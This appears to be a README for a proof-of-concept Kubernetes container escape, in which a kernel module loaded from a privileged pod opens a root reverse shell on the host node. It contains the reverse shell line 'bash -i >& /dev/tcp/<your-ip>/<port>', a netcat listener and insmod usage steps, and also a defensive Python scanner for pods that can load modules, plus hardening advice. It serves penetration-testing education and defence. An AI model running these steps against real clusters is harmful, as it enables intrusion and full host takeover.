
🛠️ Kernel Module Reverse Shell – Privileged Container Escape PoC

This repository demonstrates a real-world container escape technique using a custom Linux Kernel Module (LKM) to spawn a reverse shell from within a --privileged Kubernetes container.

Featured in RBT Security’s Kubernetes Penetration Testing – Part Three, this proof-of-concept shows how attackers can go beyond the container boundary and execute commands directly on the host.

Video Tutorial: https://www.youtube.com/watch?v=YHCwMQY5SYs&list=PLUMEY7cBcvDMBeAK8RbJ00VHCIZkQcTV1

⚠️ For educational and authorized testing only.
Do NOT run this code in any environment you do not own or have explicit permission to test.


🔍 About LKM (Description)

A Loadable Kernel Module (LKM) is code that the running kernel loads at runtime, without a reboot. Because containers share the host's kernel, a module loaded from a privileged Kubernetes container runs inside the node's kernel, which can enable full host compromise. This PoC shows how an attacker who already has code execution (here via SSTI) loads a reverse shell LKM and escapes the container to gain root access on the Node.


🚀 How It Works

  1. The attacker exploits a vulnerability (e.g., SSTI) to gain code execution inside a privileged container.
  2. A custom kernel module is compiled inside the container and loaded with insmod, with the reverse shell IP and port hardcoded in the source code.
  3. Once loaded, the module uses call_usermodehelper() to initiate a reverse shell to the attacker's listener.
  4. Since the container runs with full kernel capabilities (e.g., CAP_SYS_MODULE) and the module executes in the host kernel, the spawned shell runs as root on the node rather than inside the container, granting host-level command execution.
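The precondition for steps 2 through 5 is a pod that is allowed to load kernel modules: a container running `privileged: true`, or one that adds CAP_SYS_MODULE. The following is an added defensive check, not code from this repository; it walks pod specs in the dict shape that `kubectl get pods -o json` returns (the sample pods below are constructed for illustration) and reports every container that meets either condition, so a cluster owner can find such workloads before an attacker does.

```python
"""Flag Kubernetes pod specs whose containers could load kernel modules.

Added defensive example (not the repository's code). Any container that is
privileged, or that adds SYS_MODULE (or ALL) to its capabilities, can run
insmod against the shared host kernel, which is exactly what this PoC relies on.
"""
from __future__ import annotations

from typing import Iterable

# Capabilities that permit init_module/finit_module.
MODULE_LOADING_CAPS = {"SYS_MODULE", "ALL"}


def _normalize_cap(cap: str) -> str:
    """Accept 'SYS_MODULE', 'CAP_SYS_MODULE', 'sys_module' and so on."""
    cap = cap.strip().upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def container_findings(container: dict) -> list[str]:
    """Return the reasons a single container spec could load kernel modules."""
    sc = container.get("securityContext") or {}
    findings: list[str] = []
    if sc.get("privileged"):
        # privileged implies every capability, SYS_MODULE included.
        findings.append("privileged: true")
    caps = sc.get("capabilities") or {}
    added = {_normalize_cap(c) for c in (caps.get("add") or [])}
    for cap in sorted(added & MODULE_LOADING_CAPS):
        findings.append(f"capabilities.add includes {cap}")
    return findings


def pod_findings(pod: dict) -> list[tuple[str, str]]:
    """Return (namespace/pod:container, reason) pairs for one pod object."""
    spec = pod.get("spec") or {}
    meta = pod.get("metadata") or {}
    pod_ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
    results: list[tuple[str, str]] = []
    # Init and ephemeral containers get their own securityContext, so check them too.
    for field in ("initContainers", "containers", "ephemeralContainers"):
        for c in spec.get(field) or []:
            for reason in container_findings(c):
                results.append((f"{pod_ref}:{c.get('name', '?')}", reason))
    return results


def pods_able_to_load_modules(pods: Iterable[dict]) -> dict[str, list[str]]:
    """Aggregate findings across pods: container reference -> list of reasons."""
    report: dict[str, list[str]] = {}
    for pod in pods:
        for ref, reason in pod_findings(pod):
            report.setdefault(ref, []).append(reason)
    return report


# Constructed sample pods (not taken from any real cluster).
SAMPLE_PODS = [
    {   # Mirrors the PoC's starting point: a web app running privileged.
        "metadata": {"name": "web-app", "namespace": "prod"},
        "spec": {"containers": [
            {"name": "app", "image": "example/web:1.0",
             "securityContext": {"privileged": True}}]},
    },
    {   # Not privileged, but an init container adds SYS_MODULE explicitly.
        "metadata": {"name": "sidecar-demo", "namespace": "dev"},
        "spec": {
            "initContainers": [
                {"name": "init",
                 "securityContext": {"capabilities": {"add": ["CAP_SYS_MODULE", "NET_ADMIN"]}}}],
            "containers": [{"name": "main"}],
        },
    },
    {   # Hardened pod: drops everything, never flagged.
        "metadata": {"name": "hardened", "namespace": "prod"},
        "spec": {"containers": [
            {"name": "app",
             "securityContext": {"privileged": False, "capabilities": {"drop": ["ALL"]}}}]},
    },
]


if __name__ == "__main__":
    for ref, reasons in pods_able_to_load_modules(SAMPLE_PODS).items():
        print(f"{ref}: {', '.join(reasons)}")
```

Both conditions the check flags are rejected by the Pod Security Admission `baseline` level (it forbids `privileged: true` and any `capabilities.add` beyond its short allow-list, which does not include SYS_MODULE), so enforcing `baseline` or `restricted` on application namespaces closes the door this PoC walks through. On the node side, an auditd rule on the `init_module` and `finit_module` syscalls records any module load that does get through.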

📁 Files

  • k8s-lkm-reverse-shell.c: The kernel module source code
  • Makefile: Used to compile the module for the target kernel

💻 Usage

```bash
# Step 1: Install dependencies inside the container
apt update
apt install -y build-essential linux-headers-$(uname -r)
```

Step 2: Edit the reverse shell IP and port in `k8s-lkm-reverse-shell.c`, replacing `<your-ip>` and `<port>` with your attacker's listener:

```c
#define REVERSE_SHELL_CMD "bash -i >& /dev/tcp/<your-ip>/<port> 0>&1"
```

```bash
# Step 3: Compile the kernel module
make clean && make

# Step 4: Start your listener
nc -lvnp 6999

# Step 5: Load the kernel module (inside the container)
insmod k8s-lkm-reverse-shell.ko
```
